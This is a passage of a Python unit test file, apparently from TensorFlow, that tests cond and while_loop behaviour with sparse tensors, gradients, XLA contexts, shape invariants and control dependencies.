x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
pred = math_ops.less(1, 2)
fn1 = lambda: sparse_tensor.SparseTensor(
indices + 1, x.values + 1, dense_shape=shape)
fn2 = lambda: sparse_tensor.SparseTensor(
indices, x.values - 1, dense_shape=shape)
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([3.0, 5.0], r.values.eval())
self.assertAllEqual([[1], [4]], r.indices.eval())
self.assertAllEqual(r.values.get_shape(), (2,))
def testCondResource(self):
with self.cached_session():
rv = resource_variable_ops.ResourceVariable(True)
variables.global_variables_initializer().run()
t = ops.convert_to_tensor(1.0)
def case():
assign = resource_variable_ops.assign_variable_op(rv.handle, False)
with ops.control_dependencies([assign]):
return array_ops.identity(t)
self.assertEqual(1.0, control_flow_ops.cond(rv, case, lambda: t).eval())
@test_util.disable_control_flow_v2("b/113293074")
def testCondIndexedSlicesDifferentTypes(self):
with self.cached_session():
values = constant_op.constant(10)
i_32 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int32)
i_64 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int64)
x = ops.IndexedSlices(values, i_32)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), i_32)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), i_64)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
def testCondColocation(self):
with self.test_session(use_gpu=True):
with ops.device("/cpu:0"):
v = variables.Variable(7.0)
x = constant_op.constant(10.0)
pred = math_ops.less(1.0, 2.0)
fn1 = lambda: math_ops.add(v, 1.0)
fn2 = lambda: math_ops.subtract(x, 1.0)
r = control_flow_ops.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
r = control_flow_ops.cond(pred, fn1, fn2)
result = r.eval()
self.assertAllEqual(11, result)
def testCond_1(self):
self._testCond_1(use_gpu=False)
# TODO(b/116526896): Enable GPU tests.
# self._testCond_1(use_gpu=True)
def testCond_2(self):
with self.cached_session():
x = constant_op.constant(10)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
result = r.eval()
self.assertAllEqual(9, result)
def testCond_3(self):
with self.cached_session():
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
fn3 = lambda: math_ops.add(control_flow_ops.cond(pred, fn1, fn2), 1)
r = control_flow_ops.cond(pred, fn3, fn2)
result = r.eval()
self.assertAllEqual(12, result)
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testCond_4(self):
with self.cached_session():
v1 = variables.Variable(7)
v2 = variables.Variable(7)
v3 = variables.Variable(7)
age = constant_op.constant(3)
max_age = constant_op.constant(2)
pred = math_ops.greater(age, max_age)
fn1 = lambda: [state_ops.assign(v1, 1).op, state_ops.assign(v2, 2).op]
fn2 = lambda: [state_ops.assign(v3, 3).op, constant_op.constant(10).op]
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
self.assertEqual(len(r), 2)
result = r[1].eval()
self.assertAllEqual(True, result)
self.assertAllEqual(7, v1.eval())
self.assertAllEqual(2, v2.eval())
self.assertAllEqual(7, v3.eval())
def testCond_5(self):
with self.cached_session():
alive = constant_op.constant(True, name="alive")
count = constant_op.constant(0, name="count")
def body(i):
return control_flow_ops.cond(
alive, lambda: [math_ops.less(i, 3), math_ops.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, count.eval())
def testCond_6(self):
with self.cached_session():
v1 = variables.Variable([7])
age = constant_op.constant(3)
pred = math_ops.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
result = r.eval()
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, 1), math_ops.add(x, 2)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], sess.run(r))
def testCondRef(self):
with self.cached_session():
x = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="x",
container="",
shared_name="")
true_fn = lambda: x
false_fn = lambda: constant_op.constant([2.0])
r = control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
self.assertAllEqual([2.0], r.eval())
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
def testCondWithControl(self):
with self.cached_session():
control_holder = array_ops.placeholder(dtypes.float32, shape=())
a = constant_op.constant(3)
def true_branch():
with ops.control_dependencies([control_holder]):
_ = a + 1
return a + 2
r = control_flow_ops.cond(
constant_op.constant(True), true_branch,
lambda: constant_op.constant(1))
self.assertEqual(5, r.eval())
def testUninitializedRefIdentity(self):
with self.cached_session() as sess:
v = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="v",
container="",
shared_name="")
inited = state_ops.is_variable_initialized(v)
v_f, v_t = control_flow_ops.ref_switch(v, inited)
# Both v_f and v_t are uninitialized references. However, an actual use
# of the reference in the 'true' branch in the 'tf.identity' op will
# not 'fire' when v is uninitialized, so this is a valid construction.
# This test tests that ref_identity allows uninitialized ref as input
# so that this construction is allowed.
v_f_op = gen_array_ops.ref_identity(v_f)
v_t_op = gen_array_ops.ref_identity(v_t)
with ops.control_dependencies([v_f_op]):
assign_v = state_ops.assign(v, [1.0])
with ops.control_dependencies([v_t_op]):
orig_v = array_ops.identity(v)
merged_op = control_flow_ops.merge([assign_v, orig_v])
self.assertAllEqual([1.0], sess.run(merged_op.output))
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCondSwitchIdentity(self):
# Make sure the recv identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCondRecvIdentity(self):
# Make sure the switch identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
with ops.device(test.gpu_device_name()):
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
with ops.device("/cpu:0"):
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
@test_util.disable_control_flow_v2("b/113346829 (gpu failure)")
def testCondGrad_1(self):
graph = ops.Graph()
with graph.as_default():
x = constant_op.constant(10.0, name="x")
pred = math_ops.less(1, 2)
fn1 = lambda: array_ops.identity(x)
fn2 = lambda: array_ops.identity(x)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
with self.cached_session():
self.assertAllEqual(1.0, grad.eval())
def testCondGrad_2(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
x = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
fn1 = lambda: math_ops.multiply(x, 42.0)
fn2 = lambda: math_ops.multiply(x, 3.0)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
@test_util.disable_control_flow_v2(
"b/110550782 (gradient w.r.t external variable)")
def testCondGrad_3(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
ox = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
def fn1(x):
m = x * x
return gradients_impl.gradients(m, [ox])[0]
fn2 = lambda: math_ops.multiply(ox, 3.0)
y = math_ops.multiply(7.0, ox)
r = control_flow_ops.cond(pred, lambda: fn1(y), fn2)
self.assertAllEqual(980.0, r.eval(feed_dict={c: 1}))
self.assertAllEqual(30.0, r.eval(feed_dict={c: 3}))
def testNestedCond_Simple(self):
with self.cached_session():
x = constant_op.constant(0., name="X")
y = control_flow_ops.cond(
constant_op.constant(True), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(y, x)[0]
self.assertEqual(1.0, result.eval())
z = control_flow_ops.cond(
constant_op.constant(False), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(z, x)[0]
self.assertEqual(1.0, result.eval())
@test_util.disable_control_flow_v2("b/113327884")
def testCondGrad_Gather(self):
with self.cached_session() as sess:
v1 = variables.Variable([1.0, 42.0])
c = array_ops.placeholder(dtypes.int32, shape=[])
pred = math_ops.less(c, 2)
fn1 = lambda: array_ops.identity(v1)
fn2 = lambda: array_ops.gather(v1, [1, 1])
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [v1])[0]
variables.global_variables_initializer().run()
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
# Microbenchmark: 256,000 iterations/s.
@test_util.disable_control_flow_v2("b/116630618 (Times out)")
def testWhile_1(self):
with self.cached_session():
n = constant_op.constant(0)
c = lambda x: math_ops.less(x, 10000)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
def testWhileExternalControlDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(i):
with ops.control_dependencies([increment]):
return i + 1
result = control_flow_ops.while_loop(cond=lambda i: i < 2,
body=body_fn, loop_vars=[1])
self.assertAllEqual(result.eval(), 2)
self.assertAllEqual(v.eval(), 1.0)
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
def testWhileExternalControlDependenciesNoInput(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(unused_i):
with ops.control_dependencies([increment]):
return constant_op.constant(5, name="five")
result = control_flow_ops.while_loop(cond=lambda i: i < 5,
body=body_fn, loop_vars=[0])
result.eval()
self.assertAllEqual(v.eval(), 1.0)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileWithRefs_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 100)
self.assertEqual(x.dtype, dtypes.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, dtypes.int32_ref)
return (i + 1, gen_array_ops.ref_identity(x))
r = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=5)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.int32_ref)
value_i, value_x = sess.run(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.cached_session():
s = constant_op.constant(0)
r = isum(s)
self.assertAllEqual(45, r.eval())
@test_util.disable_control_flow_v2("b/115776323 (max_iters)")
def testWhileWithMaximumIterations(self):
with self.cached_session():
s = constant_op.constant([1, 2, 3, 4, 5])
r = isum(s, maximum_iterations=3)
self.assertAllEqual([1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3], r.eval())
@test_util.disable_control_flow_v2("b/116339888 (non-tensor loop var)")
def testWhileWithMaximumIterationsAndSingleArgument(self):
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [0], maximum_iterations=1)
self.assertEqual(1, r.eval())
@test_util.disable_control_flow_v2(
"b/116248044 (nested), b/115920078 (gradients)")
def testSingleNestedMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def training_loop_with_gradient(i):
out = control_flow_ops.while_loop(
lambda i_, _: i_ < 3,
lambda i_, j: [i_ + 1, j * v], [0, 1.0],
maximum_iterations=i)
g = gradients_impl.gradients(out, v)
with ops.control_dependencies(g):
return i + 1
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
# Create training loop, ensure we can call gradient() of
# while_loop inside the training loop.
loop = control_flow_ops.while_loop(lambda i: i < 3,
training_loop_with_gradient, [0])
xla_context.Exit()
loop_execute = array_ops.identity(loop) # Because loop is not fetchable.
# Should execute without issue.
self.assertEqual(3, self.evaluate(loop_execute))
@test_util.disable_control_flow_v2("b/116248044 (nested while_loop)")
def testInvalidMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def inner_body(i, x):
out = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, j: [i + 1, j * v], [0, x],
maximum_iterations=i)
return out
def create_while_loop(maximum_iterations=None):
return control_flow_ops.while_loop(
lambda i, _: i < 3,
inner_body, [0, 1.0],
maximum_iterations=maximum_iterations)
loop_no_xla = create_while_loop(maximum_iterations=5)
# maximum_iterations is fine outside of an XLA scope
gs = gradients_impl.gradients(loop_no_xla, v)
self.evaluate(gs) # This should execute without error.
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop_no_maxiter = create_while_loop()
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside "
r"XLA while_loop because maximum_iterations was not passed to "
r"the tf.while_loop call \('.+'\)."):
_ = gradients_impl.gradients(loop_no_maxiter, v)
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.+' for while_loop context "
r"'.+' must be statically known \(e.g. a constant value or known "
r"shape dimension\), or be defined at or outside the while loop "
r"context '.*' \(currently defined in '.*'\)"):
_ = gradients_impl.gradients(loop_with_maxiter, v)
@test_util.disable_control_flow_v2("b/115776323 (max_iters)")
def testInvalidMaximumIterationsFromSiblingContextWhileLoopInXLAContext(self):
v = constant_op.constant(1.0)
def create_while_loop():
max_iter_holder = []
def create_mi():
max_iter_holder.append(array_ops.placeholder(dtypes.int32, shape=()))
return 1.0
_ = control_flow_ops.cond(
constant_op.constant(True), create_mi, create_mi)
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, v * x), (0, 1.0),
maximum_iterations=max_iter_holder[0])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop = create_while_loop()
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.*Placeholder:0' for "
r"while_loop context '.+' must be statically known \(e.g. a constant "
r"value or known shape dimension\), or be defined at or outside the "
r"while loop context '' \(currently defined in 'cond/.+'\)"):
_ = gradients_impl.gradients(loop, v)
@test_util.disable_control_flow_v2(
"b/116248044 (nesting), b/115776323 (max_iters)")
def testNestedWhileLoopWithMaxItersFromOuterContextInXLAContext(self):
v = constant_op.constant(1.0)
p = array_ops.placeholder(dtype=dtypes.int32)
def mid_body_builder(iterations):
def mid_body(i, x):
r = control_flow_ops.while_loop(
lambda *_: True,
lambda i, x: (i + 1, v * x), (0, x),
maximum_iterations=iterations,
name="inner")
return (i + 1, gradients_impl.gradients(x + r[1], v)[0])
return mid_body
def outer_body(i, x):
iterations = array_ops.size(p, name="iterations")
return (i + 1, x + control_flow_ops.while_loop(
lambda *_: True,
mid_body_builder(iterations), (0, x),
maximum_iterations=iterations,
name="mid")[1])
def create_while_loop():
with ops.device("/cpu:0"):
r = control_flow_ops.while_loop(
lambda *_: True,
outer_body, (0, 1.0),
maximum_iterations=5,
name="outer")
return array_ops.identity(r[1])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
final_with_xla_context = create_while_loop()
xla_context.Exit()
final_without_xla_context = create_while_loop()
with self.test_session(use_gpu=False) as sess:
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
final_value_without_xla_context = sess.run(
final_without_xla_context, feed_dict={
p: [0, 0, 0]
})
final_value_with_xla_context = sess.run(
final_with_xla_context,
feed_dict={p: [0, 0, 0]},
options=opts,
run_metadata=run_metadata)
node_stats = run_metadata.step_stats.dev_stats[0].node_stats
stack_push_count = len(
[x for x in node_stats if x.node_name.endswith("StackPushV2")])
# Pushes to the stack = product of maximum_iterations values;
# the last two "3"s comes from size(p), when p == [0, 0, 0].
self.assertEqual(stack_push_count, 5 * 3 * 3)
self.assertAllClose(final_value_with_xla_context,
final_value_without_xla_context)
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
def testWhile_3(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [math_ops.add(m, 1), math_ops.add(c, 1)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
d = ops.convert_to_tensor(100)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, d),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(10100, result)
def testWhile_4(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [array_ops.gather(x, i), array_ops.gather(x, i)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, s),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(42, result)
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhile_5(self):
with self.cached_session():
def compute(i, c, o):
c = array_ops.strided_slice(x, array_ops.expand_dims(i, 0),
[1] + array_ops.expand_dims(i, 0))
o = array_ops.concat([o, c], 0)
i = math_ops.add(i, 1)
return [i, c, o]
i = ops.convert_to_tensor(0)
c = ops.convert_to_tensor([0])
o = ops.convert_to_tensor([0])
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, c, o: math_ops.less(i, s),
compute, [i, c, o], [
i.get_shape(),
tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()
])
result = r[2].eval()
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
@test_util.disable_control_flow_v2("b/116338794 (buffer_reuse)")
def testBufferForwarding(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with self.cached_session() as sess:
with ops.device("/cpu:0"):
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
r_val = sess.run(r, options=run_options, run_metadata=run_metadata)
self.assertEqual(1000, r_val)
self.assertTrue(run_metadata.HasField("step_stats"))
unique_allocs = set()
for node_stat in run_metadata.step_stats.dev_stats[0].node_stats:
for output in node_stat.output:
unique_allocs.add(
output.tensor_description.allocation_description.ptr)
# Prior to cl/147536680, the number of unique allocations was about 1005.
self.assertLess(len(unique_allocs), 756)
def _testWhile_Gpu_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
b = lambda x: math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
return math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_2(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileShape(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def _b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.tile(j, [2, 2])
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, _b, [i, m],
[i.get_shape(), tensor_shape.unknown_shape()])
r = r[1] * array_ops.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), r.eval())
@test_util.disable_control_flow_v2("b/116339888 (non-tensor loop var)")
def testWhileWithNonTensorInput_Scalar(self):
with self.cached_session():
n = 0
c = lambda x: x < 10000
b = lambda x: x + 1
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
@test_util.disable_control_flow_v2("b/116339888 (non-tensor loop var)")
def testWhileWithNonTensorInput_Vector(self):
with self.cached_session():
n = np.array([0]) # Note, [0] would not work here; that is a list
c = lambda x: x[0] < 10000
b = lambda x: array_ops.stack([x[0] + 1])
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual([10000], r.eval())
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileShapeInference(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.concat([j, j], 0)
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, b, [i, m],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertIsNone(r[1].get_shape()[0].value)
self.assertEqual(r[1].get_shape()[1], tensor_shape.Dimension(2))
with self.assertRaisesRegexp(
ValueError,
r"Input tensor 'ones:0' enters the loop with shape \(2, 2\), but has "
r"shape \(4, 2\) after one iteration. To allow the shape to vary "
r"across iterations, use the `shape_invariants` argument of "
r"tf.while_loop to specify a less-specific shape."):
r = control_flow_ops.while_loop(c, b, [i, m])
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
def testWhileShapeInferenceSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 1)
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None])])
self.assertTrue(r.dense_shape.get_shape()[0].value is None)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([5])])
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
def testWhileShapeInferenceIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([[2.0, 4.0], [3.0, 5.0]], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10, 2], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertEqual(r.values.get_shape(), tensor_shape.TensorShape([2, 2]))
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertTrue(r.values.get_shape()[0].value is None)
self.assertEqual(r.values.get_shape()[1].value, 2)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 5])])
def _testNestedWhile_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(0)
def cpu_sum(s):
c = lambda i, s: math_ops.less(i, 10)
def b(i, s):
i1 = math_ops.add(i, 1)
with ops.device("/cpu:0"):
s1 = math_ops.add(i, s)
return i1, s1
_, r_s = control_flow_ops.while_loop(c, b, [n, s])
return r_s
c = lambda x: math_ops.less(x, 200)
b = lambda x: math_ops.add(x, cpu_sum(n))
r = control_flow_ops.while_loop(c, b, [n])
self.assertEqual(225, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def _testNestedWhile_2(self, use_gpu):
# Test the cases that A -> Enter and Exit -> A are partitioned.
with self.test_session(use_gpu=use_gpu):
s0 = constant_op.constant(2.0)
def inner_loop(s):
c = lambda s: math_ops.less(s, 20.0)
def b(s):
s1 = math_ops.add(s, s)
return s1
r_s = control_flow_ops.while_loop(c, b, [s], parallel_iterations=1)
return r_s
outer_c = lambda x: math_ops.less(x, 3000.0)
def outer_b(x):
x = logging_ops.Print(x, [x]) # Edge "Print -> Enter" is partitioned
x = inner_loop(x)
with ops.device("/cpu:0"):
x = math_ops.square(x) # Edge "Exit -> Square" is partitioned
return x
r = control_flow_ops.while_loop(
outer_c, outer_b, [s0], parallel_iterations=1)
self.assertEqual(1048576.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testNestedWhile_2(self):
self._testNestedWhile_2(use_gpu=False)
self._testNestedWhile_2(use_gpu=True)
def testWhileWithControl_1(self):
with self.cached_session():
n = constant_op.constant(0)
r = constant_op.constant(0)
condition = lambda n_, r_: math_ops.less(n_, 10)
def body(n_, r_):
n_ = math_ops.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [n_, r_]
res = control_flow_ops.while_loop(
condition, body, [n, r], parallel_iterations=1)
self.assertAllEqual(12, res[1].eval())
def testWhileWithControl_2(self):
with self.cached_session():
r = constant_op.constant(0)
condition = lambda r_: math_ops.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [r_]
res = control_flow_ops.while_loop(
condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, res.eval())
def testWhileWithControl_3(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(lambda x: x < 10, lambda x: x + c, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileWithControl_4(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(
lambda x: x < 10, lambda x: x + array_ops.identity(c), [x0])
self.assertEqual(10, sess.run(r, {b: True}))
@test_util.disable_control_flow_v2("b/79881896 (control_deps)")
def testWhileWithControl_5(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
def body(x):
with ops.control_dependencies([b]):
return x + c
r = control_flow_ops.while_loop(lambda x: x < 10, body, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileCondWithControl(self):
# Ensure that no control edges by an outer control dependency context are
# added to nodes inside cond/while contexts.
with self.cached_session() as sess:
const_true = lambda: constant_op.constant(True)
const_false = lambda: constant_op.constant(False)
cond = lambda i: control_flow_ops.cond(i > 0, const_true, const_false)
body = lambda i: control_flow_ops.cond(i > 0, lambda: i - 1, lambda: i)
with ops.control_dependencies([control_flow_ops.no_op()]):
loop = control_flow_ops.while_loop(cond, body,
(constant_op.constant(5),))
self.assertEqual(0, sess.run(loop))
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testWhileCondWithControl_1(self):
with self.cached_session():
v = variable_scope.get_variable(
"v", [], initializer=init_ops.constant_initializer(2))
i0 = constant_op.constant(0)
with ops.control_dependencies([i0]):
def loop_condition(i):
return i < 4
def loop_body(i):
some_cond = control_flow_ops.cond(
constant_op.constant(True),
lambda: state_ops.assign(v, math_ops.square(v)), lambda: v)
with ops.control_dependencies([some_cond]):
return i + 1
r = control_flow_ops.while_loop(loop_condition, loop_body, (i0,))
variables.global_variables_initializer().run()
